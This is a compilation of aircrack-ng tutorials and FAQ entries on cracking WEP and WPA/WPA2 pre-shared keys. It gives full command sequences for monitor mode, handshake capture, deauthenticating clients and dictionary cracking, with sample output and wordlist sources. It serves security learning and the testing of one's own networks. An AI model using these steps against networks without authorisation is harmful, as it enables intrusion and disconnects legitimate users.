  2    0/  2   56(  87) A6(  63) 15(  17) 02(  15) 6B(  15) E0(  15) AB(  13) 0E(  10) 17(  10) 27(  10) 
  3    1/  5   78(  43) 1A(  20) 9B(  20) 4B(  17) 4A(  16) 2B(  15) 4D(  15) 58(  15) 6A(  15) 7C(  15) 
 
                       KEY FOUND! [ 12:34:56:78:90 ] 
      Probability: 100%

Notice that in this case it took far less then the estimated 250,000 IVs to crack the key. (For this example, the FMS/KoreK attack was used.)
General Troubleshooting

    Be sure to read all the documentation on the Wiki for the various commands used in this tutorial.
    See Tutorial: I am injecting but the IVs don't increase

Generating ARPs

In order for this tutorial to work, you must receive at least one ARP packet. On your home network, here is an easy way to generate an ARP packet. On a wired or wireless PC, ping a non-existent IP on your home LAN. A wired PC means a PC connected to your LAN via an ethernet cable. Lets say your home LAN address space is 192.168.1.1 through 192.168.1.254. Pick an IP between 1 and 254 which is not assigned to a network device. For example, if the IP 192.168.1.213 is not being used then ping 192.168.1.213. This will cause an ARP to be broadcast via your wireless access point and in turn, this will kick off the reinjection of packets by aireplay-ng.

################################################################

Tutorial: How to Crack WPA/WPA2

Version: 1.20 March 07, 2010
By: darkAudax
Introduction

This tutorial walks you through cracking WPA/WPA2 networks which use pre-shared keys. I recommend you do some background reading to better understand what WPA/WPA2 is. The Wiki links page has a WPA/WPA2 section. The best document describing WPA is Wi-Fi Security - WEP, WPA and WPA2. This is the link to download the PDF directly. The WPA Packet Capture Explained tutorial is a companion to this tutorial.

WPA/WPA2 supports many types of authentication beyond pre-shared keys. aircrack-ng can ONLY crack pre-shared keys. So make sure airodump-ng shows the network as having the authentication type of PSK, otherwise, don't bother trying to crack it.

There is another important difference between cracking WPA/WPA2 and WEP. This is the approach used to crack the WPA/WPA2 pre-shared key. Unlike WEP, where statistical methods can be used to speed up the cracking process, only plain brute force techniques can be used against WPA/WPA2. That is, because the key is not static, so collecting IVs like when cracking WEP encryption, does not speed up the attack. The only thing that does give the information to start an attack is the handshake between client and AP. Handshaking is done when the client connects to the network. Although not absolutely true, for the purposes of this tutorial, consider it true. Since the pre-shared key can be from 8 to 63 characters in length, it effectively becomes impossible to crack the pre-shared key.

The only time you can crack the pre-shared key is if it is a dictionary word or relatively short in length. Conversely, if you want to have an unbreakable wireless network at home, use WPA/WPA2 and a 63 character password composed of random characters including special symbols.

The impact of having to use a brute force approach is substantial. Because it is very compute intensive, a computer can only test 50 to 300 possible keys per second depending on the computer CPU. It can take hours, if not days, to crunch through a large dictionary. If you are thinking about generating your own password list to cover all the permutations and combinations of characters and special symbols, check out this brute force time calculator first. You will be very surprised at how much time is required.

IMPORTANT This means that the passphrase must be contained in the dictionary you are using to break WPA/WPA2. If it is not in the dictionary then aircrack-ng will be unable to determine the key.

There is no difference between cracking WPA or WPA2 networks. The authentication methodology is basically the same between them. So the techniques you use are identical.

It is recommended that you experiment with your home wireless access point to get familiar with these ideas and techniques. If you do not own a particular access point, please remember to get permission from the owner prior to playing with it.

Please send me any constructive feedback, positive or negative. Additional troubleshooting ideas and tips are especially welcome.
Assumptions

First, this solution assumes:

    You are using drivers patched for injection. Use the injection test to confirm your card can inject.
    You are physically close enough to send and receive access point and wireless client packets. Remember that just because you can receive packets from them does not mean you may will be able to transmit packets to them. The wireless card strength is typically less then the AP strength. So you have to be physically close enough for your transmitted packets to reach and be received by both the AP and the wireless client. You can confirm that you can communicate with the specific AP by following these instructions.
    You are using v0.9.1 or above of aircrack-ng. If you use a different version then some of the command options may have to be changed.

Ensure all of the above assumptions are true, otherwise the advice that follows will not work. In the examples below, you will need to change ath0 to the interface name which is specific to your wireless card.
Equipment used

In this tutorial, here is what was used:

    MAC address of PC running aircrack-ng suite: 00:0F:B5:88:AC:82
    MAC address of the wireless client using WPA2: 00:0F:B5:FD:FB:C2
    BSSID (MAC address of access point): 00:14:6C:7E:40:80
    ESSID (Wireless network name): teddy
    Access point channel: 9
    Wireless interface: ath0

You should gather the equivalent information for the network you will be working on. Then just change the values in the examples below to the specific network.
Solution
Solution Overview

The objective is to capture the WPA/WPA2 authentication handshake and then use aircrack-ng to crack the pre-shared key.

This can be done either actively or passively. Actively means you will accelerate the process by deauthenticating an existing wireless client. Passively means you simply wait for a wireless client to authenticate to the WPA/WPA2 network. The advantage of passive is that you don't actually need injection capability and thus the Windows version of aircrack-ng can be used.

Here are the basic steps we will be going through:

    Start the wireless interface in monitor mode on the specific AP channel
    Start airodump-ng on AP channel with filter for bssid to collect authentication handshake
    Use aireplay-ng to deauthenticate the wireless client
    Run aircrack-ng to crack the pre-shared key using the authentication handshake

Step 1 - Start the wireless interface in monitor mode

The purpose of this step is to put your card into what is called monitor mode. Monitor mode is the mode whereby your card can listen to every packet in the air. Normally your card will only hear packets addressed to you. By hearing every packet, we can later capture the WPA/WPA2 4-way handshake. As well, it will allow us to optionally deauthenticate a wireless client in a later step.

The exact procedure for enabling monitor mode varies depending on the driver you are using. To determine the driver (and the correct procedure to follow), run the following command:

 airmon-ng

On a machine with a Ralink, an Atheros and a Broadcom wireless card installed, the system responds:

 Interface       Chipset         Driver
 
 rausb0          Ralink RT73     rt73
 wlan0           Broadcom        b43 - [phy0]
 wifi0           Atheros         madwifi-ng
 ath0            Atheros         madwifi-ng VAP (parent: wifi0)

The presence of a [phy0] tag at the end of the driver name is an indicator for mac80211, so the Broadcom card is using a mac80211 driver. Note that mac80211 is supported only since aircrack-ng v1.0-rc1, and it won't work with v0.9.1. Both entries of the Atheros card show madwifi-ng as the driver - follow the madwifi-ng-specific steps to set up the Atheros card. Finally, the Ralink shows neither of these indicators, so it is using an ieee80211 driver - see the generic instructions for setting it up.
Step 1a - Setting up madwifi-ng

First stop ath0 by entering:

 airmon-ng stop ath0   

The system responds:

 Interface       Chipset         Driver
 
 wifi0           Atheros         madwifi-ng
 ath0            Atheros         madwifi-ng VAP (parent: wifi0) (VAP destroyed)

Enter iwconfig to ensure there are no other athX interfaces. It should look similar to this:

 lo        no wireless extensions.
 
 eth0      no wireless extensions.
 
 wifi0     no wireless extensions.

If there are any remaining athX interfaces, then stop each one. When you are finished, run iwconfig to ensure there are none left.

Now, enter the following command to start the wireless card on channel 9 in monitor mode:

 airmon-ng start wifi0 9

Note: In this command we use wifi0 instead of our wireless interface of ath0. This is because the madwifi-ng drivers are being used.

The system will respond:

 Interface       Chipset         Driver
 
 wifi0           Atheros         madwifi-ng
 ath0            Atheros         madwifi-ng VAP (parent: wifi0) (monitor mode enabled)

You will notice that ath0 is reported above as being put into monitor mode.

To confirm the interface is properly setup, enter iwconfig.

The system will respond:

 lo        no wireless extensions.
 
 wifi0     no wireless extensions.
 
 eth0      no wireless extensions.
 
 ath0      IEEE 802.11g  ESSID:""  Nickname:""
        Mode:Monitor  Frequency:2.452 GHz  Access Point: 00:0F:B5:88:AC:82   
        Bit Rate:0 kb/s   Tx-Power:18 dBm   Sensitivity=0/3  
        Retry:off   RTS thr:off   Fragment thr:off
        Encryption key:off
        Power Management:off
        Link Quality=0/94  Signal level=-95 dBm  Noise level=-95 dBm
        Rx invalid nwid:0  Rx invalid crypt:0  Rx invalid frag:0
        Tx excessive retries:0  Invalid misc:0   Missed beacon:0

In the response above, you can see that ath0 is in monitor mode, on the 2.452GHz frequency which is channel 9 and the Access Point shows the MAC address of your wireless card. Only the madwifi-ng drivers show the card MAC address in the AP field, other drivers do not. So everything is good. It is important to confirm all this information prior to proceeding, otherwise the following steps will not work properly.

To match the frequency to the channel, check out: http://www.cisco.com/en/US/docs/wireless/technology/channel/deployment/guide/Channel.html#wp134132 . This will give you the frequency for each channel.
Step 1b - Setting up mac80211 drivers

Unlike madwifi-ng, you do not need to remove the wlan0 interface when setting up mac80211 drivers. Instead, use the following command to set up your card in monitor mode on channel 9:

 airmon-ng start wlan0 9

The system responds:

 Interface       Chipset         Driver
 
 wlan0           Broadcom        b43 - [phy0]
                                 (monitor mode enabled on mon0)

Notice that airmon-ng enabled monitor-mode on mon0. So, the correct interface name to use in later parts of the tutorial is mon0. Wlan0 is still in regular (managed) mode, and can be used as usual, provided that the AP that wlan0 is connected to is on the same channel as the AP you are attacking, and you are not performing any channel-hopping.

To confirm successful setup, run iwconfig. The following output should appear:

 lo        no wireless extensions.

 eth0      no wireless extensions.
 
 wmaster0  no wireless extensions.
 
 wlan0     IEEE 802.11bg  ESSID:""
           Mode:Managed  Frequency:2.452 GHz  Access Point: Not-Associated
           Tx-Power=0 dBm
           Retry min limit:7   RTS thr:off   Fragment thr=2352 B
           Encryption key:off
           Power Management:off
           Link Quality:0  Signal level:0  Noise level:0
           Rx invalid nwid:0  Rx invalid crypt:0  Rx invalid frag:0
           Tx excessive retries:0  Invalid misc:0   Missed beacon:0
 
 mon0      IEEE 802.11bg  Mode:Monitor  Frequency:2.452 GHz  Tx-Power=0 dBm
           Retry min limit:7   RTS thr:off   Fragment thr=2352 B
           Encryption key:off
           Power Management:off
           Link Quality:0  Signal level:0  Noise level:0
           Rx invalid nwid:0  Rx invalid crypt:0  Rx invalid frag:0
           Tx excessive retries:0  Invalid misc:0   Missed beacon:0

Here, mon0 is seen as being in monitor mode, on channel 9 (2.452GHz). Unlike madwifi-ng, the monitor interface has no Access Point field at all. Also notice that wlan0 is still present, and in managed mode - this is normal. Because both interfaces share a common radio, they must always be tuned to the same channel - changing the channel on one interface also changes channel on the other one.
Step 1c - Setting up other drivers

For other (ieee80211-based) drivers, simply run the following command to enable monitor mode (replace rausb0 with your interface name):

 airmon-ng start rausb0 9

The system responds:

 Interface       Chipset         Driver
 
 rausb0          Ralink          rt73 (monitor mode enabled)

At this point, the interface should be ready to use.
Step 2 - Start airodump-ng to collect authentication handshake

The purpose of this step is to run airodump-ng to capture the 4-way authentication handshake for the AP we are interested in.

Enter:

 airodump-ng -c 9 --bssid 00:14:6C:7E:40:80 -w psk ath0

Where:

    -c 9 is the channel for the wireless network
    --bssid 00:14:6C:7E:40:80 is the access point MAC address. This eliminates extraneous traffic.
    -w psk is the file name prefix for the file which will contain the IVs.
    ath0 is the interface name.

Important: Do NOT use the --ivs option. You must capture the full packets.

Here what it looks like if a wireless client is connected to the network:

  CH  9 ][ Elapsed: 4 s ][ 2007-03-24 16:58 ][ WPA handshake: 00:14:6C:7E:40:80
                                                                                                               
  BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB  ENC  CIPHER AUTH ESSID
                                                                                                               
  00:14:6C:7E:40:80   39 100       51      116   14   9  54  WPA2 CCMP   PSK  teddy                           
                                                                                                               
  BSSID              STATION            PWR  Lost  Packets  Probes                                             
                                                                                                               
  00:14:6C:7E:40:80  00:0F:B5:FD:FB:C2   35     0      116  

In the screen above, notice the WPA handshake: 00:14:6C:7E:40:80 in the top right-hand corner. This means airodump-ng has successfully captured the four-way handshake.

Here it is with no connected wireless clients:

  CH  9 ][ Elapsed: 4 s ][ 2007-03-24 17:51 
                                                                                                               
  BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB  ENC  CIPHER AUTH ESSID
                                                                                                               
  00:14:6C:7E:40:80   39 100       51        0    0   9  54  WPA2 CCMP   PSK  teddy                           
                                                                                                               
  BSSID              STATION            PWR  Lost  Packets  Probes                                             

Troubleshooting Tip

See the Troubleshooting Tips section below for ideas.

To see if you captured any handshake packets, there are two ways. Watch the airodump-ng screen for  WPA handshake: 00:14:6C:7E:40:80 in the top right-hand corner. This means a four-way handshake was successfully captured. See just above for an example screenshot.

Use Wireshark and apply a filter of eapol. This displays only eapol packets you are interested in. Thus you can see if capture contains 0,1,2,3 or 4 eapol packets.
Step 3 - Use aireplay-ng to deauthenticate the wireless client

This step is optional. If you are patient, you can wait until airodump-ng captures a handshake when one or more clients connect to the AP. You only perform this step if you opted to actively speed up the process. The other constraint is that there must be a wireless client currently associated with the AP. If there is no wireless client currently associated with the AP, then you have to be patient and wait for one to connect to the AP so that a handshake can be captured. Needless to say, if a wireless client shows up later and airodump-ng did not capture the handshake, you can backtrack and perform this step.

This step sends a message to the wireless client saying that that it is no longer associated with the AP. The wireless client will then hopefully reauthenticate with the AP. The reauthentication is what generates the 4-way authentication handshake we are interested in collecting. This is what we use to break the WPA/WPA2 pre-shared key.

Based on the output of airodump-ng in the previous step, you determine a client which is currently connected. You need the MAC address for the following. Open another console session and enter:

 aireplay-ng -0 1 -a 00:14:6C:7E:40:80 -c 00:0F:B5:FD:FB:C2 ath0

Where:

    -0 means deauthentication
    1 is the number of deauths to send (you can send multiple if you wish)
    -a 00:14:6C:7E:40:80 is the MAC address of the access point
    -c 00:0F:B5:FD:FB:C2 is the MAC address of the client you are deauthing
    ath0 is the interface name

Here is what the output looks like:

 11:09:28  Sending DeAuth to station   -- STMAC: [00:0F:B5:34:30:30]

With luck this causes the client to reauthenticate and yield the 4-way handshake.
Troubleshooting Tips

    The deauthentication packets are sent directly from your PC to the clients. So you must be physically close enough to the clients for your wireless card transmissions to reach them. To confirm the client received the deauthentication packets, use tcpdump or similar to look for ACK packets back from the client. If you did not get an ACK packet back, then the client did not hear the deauthentication packet.

Step 4 - Run aircrack-ng to crack the pre-shared key

The purpose of this step is to actually crack the WPA/WPA2 pre-shared key. To do this, you need a dictionary of words as input. Basically, aircrack-ng takes each word and tests to see if this is in fact the pre-shared key.

There is a small dictionary that comes with aircrack-ng - password.lst. This file can be found in the test directory of the aircrack-ng source code. The Wiki FAQ has an extensive list of dictionary sources. You can use John the Ripper (JTR) to generate your own list and pipe them into aircrack-ng. Using JTR in conjunction with aircrack-ng is beyond the scope of this tutorial.

Open another console session and enter:

aircrack-ng -w password.lst -b 00:14:6C:7E:40:80 psk*.cap

Where:

    -w password.lst is the name of the dictionary file. Remember to specify the full path if the file is not located in the same directory.
    *.cap is name of group of files containing the captured packets. Notice in this case that we used the wildcard * to include multiple files.

Here is typical output when there are no handshakes found:

 Opening psk-01.cap
 Opening psk-02.cap
 Opening psk-03.cap
 Opening psk-04.cap
 Read 1827 packets.

 No valid WPA handshakes found.

When this happens you either have to redo step 3 (deauthenticating the wireless client) or wait longer if you are using the passive approach. When using the passive approach, you have to wait until a wireless client authenticates to the AP.

Here is typical output when handshakes are found:

 Opening psk-01.cap
 Opening psk-02.cap
 Opening psk-03.cap
 Opening psk-04.cap
 Read 1827 packets.
 
 #  BSSID              ESSID                     Encryption

 1  00:14:6C:7E:40:80  teddy                     WPA (1 handshake)
 
 Choosing first network as target.

Now at this point, aircrack-ng will start attempting to crack the pre-shared key. Depending on the speed of your CPU and the size of the dictionary, this could take a long time, even days.

Here is what successfully cracking the pre-shared key looks like:

                               Aircrack-ng 0.8
 
 
                 [00:00:00] 2 keys tested (37.20 k/s)
 
 
                         KEY FOUND! [ 12345678 ]
 
 
    Master Key     : CD 69 0D 11 8E AC AA C5 C5 EC BB 59 85 7D 49 3E 
                     B8 A6 13 C5 4A 72 82 38 ED C3 7E 2C 59 5E AB FD 
 
    Transcient Key : 06 F8 BB F3 B1 55 AE EE 1F 66 AE 51 1F F8 12 98 
                     CE 8A 9D A0 FC ED A6 DE 70 84 BA 90 83 7E CD 40 
                     FF 1D 41 E1 65 17 93 0E 64 32 BF 25 50 D5 4A 5E 
                     2B 20 90 8C EA 32 15 A6 26 62 93 27 66 66 E0 71 
 
    EAPOL HMAC     : 4E 27 D9 5B 00 91 53 57 88 9C 66 C8 B1 29 D1 CB 

Troubleshooting Tips
I Cannot Capture the Four-way Handshake!

It can sometimes be tricky to capture the four-way handshake. Here are some troubleshooting tips to address this:

    Your monitor card must be in the same mode as the both the client and Access Point. So, for example, if your card was in B mode and the client/AP were using G mode, then you would not capture the handshake. This is especially important for new APs and clients which may be turbo mode and/or other new standards. Some drivers allow you to specify the mode. Also, iwconfig has an option modulation that can sometimes be used. Do man iwconfig to see the options for modulation. For information, 1, 2, 5.5 and 11Mbit are 'b', 6, 9, 12, 18, 24, 36, 48, 54Mbit are 'g'.
    Sometimes you also need to set the monitor-mode card to the same speed. IE auto, 1MB, 2MB, 11MB, 54MB, etc.
    Be sure that your capture card is locked to the same channel as the AP. You can do this by specifying -c <channel of AP> when you start airodump-ng.
    Be sure there are no connection managers running on your system. This can change channels and/or change mode without your knowledge.
    You are physically close enough to receive both access point and wireless client packets. The wireless card strength is typically less then the AP strength.
    Conversely, if you are too close then the received packets can be corrupted and discarded. So you cannot be too close.
    Make sure to use the drivers specified on the wiki. Depending on the driver, some old versions do not capture all packets.
    Ideally, connect and disconnect a wireless client normally to generate the handshake.
    If you use the deauth technique, send the absolute minimum of packets to cause the client to reauthenticate. Normally this is a single deauth packet. Sending an excessive number of deauth packets may cause the client to fail to reconnect and thus it will not generate the four-way handshake. As well, use directed deauths, not broadcast. To confirm the client received the deauthentication packets, use tcpdump or similar to look for ACK packets back from the client. If you did not get an ACK packet back, then the client did not hear the deauthentication packet.
    Try stopping the radio on the client station then restarting it.
    Make sure you are not running any other program/process that could interfere such as connection managers, Kismet, etc.
    Review your captured data using the WPA Packet Capture Explained tutorial to see if you can identify the problem. Such as missing AP packets, missing client packets, etc.

Unfortunately, sometimes you need to experiment a bit to get your card to properly capture the four-way handshake. The point is, if you don't get it the first time, have patience and experiment a bit. It can be done!

Another approach is to use Wireshark to review and analyze your packet capture. This can sometimes give you clues as to what is wrong and thus some ideas on how to correct it. The WPA Packet Capture Explained tutorial is a companion to this tutorial and walks you through what a normal WPA connection looks like. As well, see the FAQ for detailed information on how to use Wireshark.

In an ideal world, you should use a wireless device dedicated to capturing the packets. This is because some drivers such as the RTL8187L driver do not capture packets the card itself sends. Also, always use the driver versions specified on the wiki. This is because some older versions of the drivers such as the RT73 driver did not capture client packets.

When using Wireshark, the filter eapol will quickly display only the EAPOL packets. Based on what EAPOL packets are actually in the capture, determine your correction plan. For example, if you are missing the client packets then try to determine why and how to collect client packets.

To dig deep into the packet analysis, you must start airodump-ng without a BSSID filter and specify the capture of the full packet, not just IVs. Needless to say, it must be locked to the AP channel. The reason for eliminating the BSSID filter is to ensure all packets including acknowledgments are captured. With a BSSID filter, certain packets are dropped from the capture.

Every packet sent by client or AP must be acknowledged. This is done with an acknowledgment packet which has a destination MAC of the device which sent the original packet. If you are trying to deauthenticate a client, one thing to check is that you receive the ack packet. This confirms the client received the deauth packet. Failure to receive the ack packet likely means that the client is out of transmission range. Thus failure.

When it comes to analyzing packet captures, it is impossible to provide detailed instructions. I have touched on some techniques and areas to look at. This is an area which requires effort to build your skills on both WPA/WPA2 plus how to use Wireshark.
aircrack-ng says "0 handshakes"

Check the I Cannot Capture the Four-way Handshake! troubleshooting tip.
aircrack-ng says "No valid WPA handshakes found"

Check the I Cannot Capture the Four-way Handshake! troubleshooting tip.

################################################################

Tutorial: WPA Packet Capture Explained

Version: 1.05 December 15, 2009
By: darkAudax

Files linked to this tutorial: wpa.full.cap wpa.bad.passpharse.cap
Introduction

This is quick and dirty explanation of two sample WPA capture files. The first file (wpa.full.cap) is a capture of a successful wireless client WPA connection to an access point. The second file (wpa.bad.key.cap) is a capture of a wireless client attempting to use the wrong passphrase to connect to the AP.

This tutorial is a companion to the How to Crack WPA/WPA2 tutorial.

The Wiki links page has a WPA/WPA2 section. The best document describing WPA is Wi-Fi Security - WEP, WPA and WPA2. This is the link to download the PDF directly.

To view the capture, use Wireshark to open it then View then Expand All. This shows all the sections and fields expanded. You will need to scroll through the fields for each packet to locate the ones mentioned. See this FAQ entry to learn how to use Wireshark.

The captures were done using an Ralink RT73 chipset and airodump-ng as the capture program.

Being able to read a capture file is an important skill to learn and build on. It allows you to troubleshoot a connection if you are having problems. By understanding this capture, you can then compare it to a live capture and hopefully find out what is going wrong.
Analysis of a successful connection

Use this file: wpa.full.cap
Packet 1

This is the access point (AP) Beacon. It announces the presence and capabilities of the AP.

If you look at the Vendor Specific attributes, you can see the WPA attributes:

Packet 2

This is a Probe Request packet. This is the client looking for the AP. You will notice that the destination MAC is all FFs which is a broadcast address. Plus, you will see that the SSID in the packet is also set to broadcast.

If the AP does not respond to this, you might see the SSID set to the AP SSID. This is what is called a directed Probe Request. The packet capture does not include an example of this.

Packet 3

This is a Probe Response packet. This is the AP responding to the client. It has a source MAC of the BSSID and a destination MAC of the client. The packet informs the client about what capabilities it supports such as transmission speeds plus other relevant capabilities.

Packets 4, 5

These are open authentication system packets.

The client sends an authentication request packet :

 and the AP responds with an authentication acceptance packet:

Packets 6, 7

These are the association packets. Essentially this joins the client to the network.

The client sends an association request packet 

 and the AP responds with an association response packet:

Packets 8, 9, 10, 11

These are the four handshake WPA packets. These are the four critical packets required by aircrack-ng to crack WPA using a dictionary.

Notice that the AP initiates the four-way handshake by sending the first packet. The first pair of packets has a replay counter value of 1. The second pair has a replay counter value of 2. Packets with the same replay counter value are matching sets. If you have only one packet for a specific replay counter value then you are missing it from the capture and packet you do have cannot be used by aircrack-ng. That is why sometimes you have four EAPOL packets in your capture but aircrack-ng still says there are 0 handshakes. You must have matching pairs.

There are some other items to point out if you are analyzing a capture looking for a valid capture. EAPOL packets 1 and 3 should have the same nonce value. If they don't, then they are not part of the matching set. Aircrack-ng also requires a valid beacon. Ensure this beacon is part of the same packet sequence numbers. For example, if the beacon packet sequence number is higher then the EAPOL packet sequence numbers from the AP, the handshake will be ignored. This is because the aircrack-ng resets handshake sets when association packets and similar are seen.

IEEE 802.11 ? Frame Control ? Flags ? DS Status Flag: The direction flags show FROM DS or TO DS depending on the packet. Meaning coming from the AP or going to it.

Packet 8:

Packet 9:

Packet 10:

Packet 11:

Packets 12, 13, 14, 15

These are data packets to/from the wireless client to the LAN via the AP. You can view the TKIP Parameters field to confirm that WPA is used for these packets:

So you should now be able to do the same tests with your cards and see what is different.
Analysis of a bad passphrase connection attempt

Use this file: wpa.bad.passpharse.cap
Packet 1

This is the access point (AP) Beacon. It announces the presence and capabilities of the AP.

If you look at the Vendor Specific attributes, you can see the WPA attributes:

Packet 2

This is a Probe Request packet. This is the client looking for the AP. You will notice that the destination MAC is all FFs which is a broadcast address. Plus, you will see that the SSID in the packet is also set to broadcast.

If the AP does not respond to this, you might see the SSID set to the AP SSID. This is what is called a directed Probe Request. The packet capture does not include an example of this.

Packet 3

This is a Probe Response packet. This is the AP responding to the client. It has a source MAC of the BSSID and a destination MAC of the client. The packet informs the client about what capabilities it supports such as transmission speeds plus other relevant capabilities.

Packets 4, 5

These are open authentication system packets. The client sends an authentication request packet and the AP responds with an authentication acceptance packet.

Packet 4:

Packet 5:

Packets 6, 7

These are the association packets. Essentially this joins the client to the network.

The client sends an association request packet 

 and the AP responds with an association response packet.

Packets 8, 9

Up to this point, you will notice that the packets are identical between a successful and failed connection.

These are the first two of four handshake WPA packets. The AP sends out a packet with information that it expects the wireless client to send back properly encrypted with passphrase. Since the wireless client is using the wrong passphrase, it is incorrect.

Notice that the AP initiates the four-way handshake by sending the first packet.

Packet 8:

Packet 9:

Packets 10, 11, 12, 13, 14, 15

These are really just repeats of packets 8 and 9. The AP is giving the wireless client a chance to correctly answer. It never does. Thus the next packet (16) is a deauthentication packet.

Notice that the AP initiates the four-way handshake by sending the first packet. Each pair has successive replay counter values.

Packet 10:

Packet 11:

Packet 12:

Packet 13:

Packet 14:

Packet 15:

Packet 16

Since the wireless client never successfully proved it had the correct passphrase, the AP now deauthenticates the client. Effectively throwing it off the AP:

Wireshark Usage Tip

In Wireshark, use eapol as a filter. This will show only handshake packets and is useful for analyzing why you don't have the full handshake.

################################################################

FAQ
What version of Aircrack-ng am I running ?

Run 'aircrack-ng | head'. Version information is in the first line of text (second if the empty line is taken into account).
What is the best wireless card to buy ?

Which card to purchase is a hard question to answer. Each person's criteria is somewhat different, such as one may require 802.11ax capability, or may require it to work via virtualization. However, having said that, then the following cards are considered the best in class:

    Alfa AWUS036ACH (a/b/g/n/ac) is the best performing card, but the driver can be unstable enough to crash your kernel
    Alfa AWUS036ACM (a/b/g/n/ac) is the highest performing of the STABLE devices, but it requires kernel 4.19.5 or higher, and the driver doesn't work on the Raspberry Pi 3 yet; it works on the Raspberry Pi 4.

Runner ups:

    Alfa AWUS036H [b/g USB]
    Ubiquiti SRC [a/b/g Cardbus]
    Ubiquiti SRX [a/b/g ExpressCard]
    Airpcap series [USB]
    TP-Link TL-WN722N v1 [b/g/n USB] - Beware, if version is not specified by vendor, it is NOT v1
    Alfa AWUS036NHA [b/g/n USB]
    Alfa AWUS051NH v2 [a/b/g/n USB]
    MiniPCIe: anything that uses ath9k, especially AR92xx and AR93xx (ability to do spectral scan)

Also read this first before purchasing. There are many available on the market for fairly low prices. You are simply trading off distance, sensitivity and performance for cost.

If you want to know if your existing card is compatible then use this page: Tutorial: Is My Wireless Card Compatible?
What tutorials are available ?

The Tutorials page has many tutorials specific to the aircrack-ng suite. If your question is not answered on this FAQ page, be sure to check out these other resources:

    The Forum
    User Documentation by platform (Linux, Windows)

The links page also generic wireless information and tutorials.
Any GPS recommendation ?

The following 2 devices have been tested and work fine:

    BU-353
    NL-402U USB

However, anything that is compatible with GPSd will work.
"command not found" error message

After you enter make install then try to use any of the aircrack-ng suite commands, you get the error message command not found or similar. See the tip with the same message in troubleshooting tips.
How do I crack a static WEP key ?

The basic idea is to capture as much encrypted traffic as possible using airodump-ng. Each WEP data packet has an associated 3-byte Initialization Vector (IV): after a sufficient number of data packets have been collected, run aircrack-ng on the resulting capture file. aircrack-ng will then perform a set of statistical attacks developed by a talented hacker named KoreK.

Since that time, the PTW approach (Pychkine, Tews, Weinmann) has been developed. The main advantage of the PTW approach is that very few data packets are required to crack the WEP key.
How many IVs are required to crack WEP ?

WEP cracking is not an exact science. The number of required IVs depends on the WEP key length, and it also depends on your luck. Usually, 40-bit WEP (64 bit key) can be cracked with 300,000 IVs, and 104-bit WEP (128 bit key) can be cracked with 1,500,000 IVs; if you're out of luck you may need two million IVs, or more.

There is no way to know the WEP key length: this information is kept hidden and never announced, either in management or data packets; as a consequence, airodump-ng can not report the WEP key length. Thus, it is recommended to run aircrack-ng twice: when you have 250,000 IVs, start aircrack-ng with -n 64 to crack 40-bit WEP. Then if the key is not found, restart aircrack-ng (without the -n option) to crack 104-bit WEP.

The figures above are based on using the Korek method. With the introduction of the PTW technique in aircrack-ng 0.9 and above, the number of data packets required to crack WEP is dramatically lowered. Using this technique, 40-bit WEP (64 bit key) can be cracked with as few as 20,000 data packets and 104-bit WEP (128 bit key) with 40,000 data packets. PTW is limited to 40 and 104 bit keys lengths. Keep in mind that it can take 100K packets or more even using the PTW method. Additionally, PTW only works properly with selected packet types. Aircrack-ng defaults to the PTW method and you must manually specify the Korek method in order to use it.
How can I know what is the key length ?

You can't know what's the key length, there's no information at all in wireless packets, that's why you have to try different lengths. Most of the time, it's a 128 bit key.
How do I know my WEP key is correct ?

Just because you seem to have successfully connected to the access point doesn't mean your WEP key is correct! To check your WEP key, the best way is to decrypt a capture file with the airdecap-ng program.
How can I crack a WPA-PSK network ?

You must sniff until a handshake takes place between a wireless client and the access point. To force the client to reauthenticate, you can start a deauth attack with aireplay-ng. Also, a good dictionary is required.

FYI, it's not possible to pre-compute large tables of Pairwise Master Keys like rainbowcrack does, since the passphrase is salted with the ESSID.
Where can I find good wordlists ?

The easiest way is do an Internet search for word lists and dictionaries. Also check out web sites for password cracking tools. Many times they have references to word lists. A few sources follow. Please add comments or additions to this thread: https://forum.aircrack-ng.org/index.php?topic=1373.0.

Remember that valid passwords are 8 to 63 characters in length. The Aircrack-ng Other Tips page has a script to eliminate passwords which are invalid in terms of length.

    OpenWall:
        ftp://ftp.openwall.com/pub/wordlists/
        https://www.openwall.com/mirrors/
    GitHub
        https://github.com/danielmiessler/SecLists/tree/master/Passwords
        https://github.com/berzerk0/Probable-Wordlists
        https://github.com/search?q=wordlist
    ftp://ftp.cerias.purdue.edu/pub/dict/
    https://www.outpost9.com/files/WordLists.html
    http://www.vulnerabilityassessment.co.uk/passwords.htm
    https://packetstormsecurity.com/Crackers/wordlists/
    http://ai1.ai.uga.edu/ftplib/natural-language/moby/
    http://wordlist.aspell.net/

How do I recover my WEP/WPA key in windows ?

You have to use WZcook
Will WPA be cracked in the future ?

It's extremely unlikely that WPA will be cracked just like WEP was.

The major problem with WEP is that the shared key is appended to the IV; the result is directly used to feed RC4. This overly simple construction is prone to a statistical attack, since the first ciphertext bytes are strongly correlated with the shared key (see Andrew Roos' paper). There are basically two counter-measures against this attack:

    Mix the IV and the shared key using a hash function or
    Discard the first 256 bytes of RC4's output.

There has been some disinformation in the news about the flaws of TKIP:

For now, TKIP is reasonably secure but it is also living on borrowed time since it still relies on the same RC4 algorithm that WEP relied on.

Actually, TKIP (WPA1) is not vulnerable: for each packet, the 48-bit IV is mixed with the 128-bit pairwise temporal key to create a 104-bit RC4 key, so there's no statistical correlation at all. Furthermore, WPA provides counter-measures against active attacks (traffic reinjection), includes a stronger message integrity code (michael), and has a very robust authentication protocol (the 4-way handshake). The only vulnerability so far is a dictionary attack, which fails if the passphrase is robust enough.

WPA2 (aka 802.11i) is exactly the same as WPA1, except that CCMP (AES in counter mode) is used instead of RC4 and HMAC-SHA1 is used instead of HMAC-MD5 for the EAPOL MIC. Bottom line, WPA2 is a bit better than WPA1, but neither are going to be cracked in the near future.
How do I learn more about WPA/WPA2?

See the links page.
How do I decrypt a capture file ?

You may use the airdecap-ng program
What are the authentication modes for WEP ?

There are two authentication modes for WEP:

    Open System Authentication: This is the default mode. All clients are accepted by the AP, and the key is never checked meaning association is always granted. However if your key is incorrect you won't be able to receive or send packets (because decryption will fail), so DHCP, ping etc. will timeout.
    Shared Key Authentication: The client has to encrypt a challenge before association is granted by the AP. This mode is flawed and leads to keystream recovery, so it's never enabled by default.

The NetGear Wireless Basics Manual has a good description of WEP Wireless Security including diagrams of the packet flows in its subsections.
How do I merge multiple capture files ?

You may use File ? Merge in Wireshark or Ethereal. Make sure to export in pcap format.

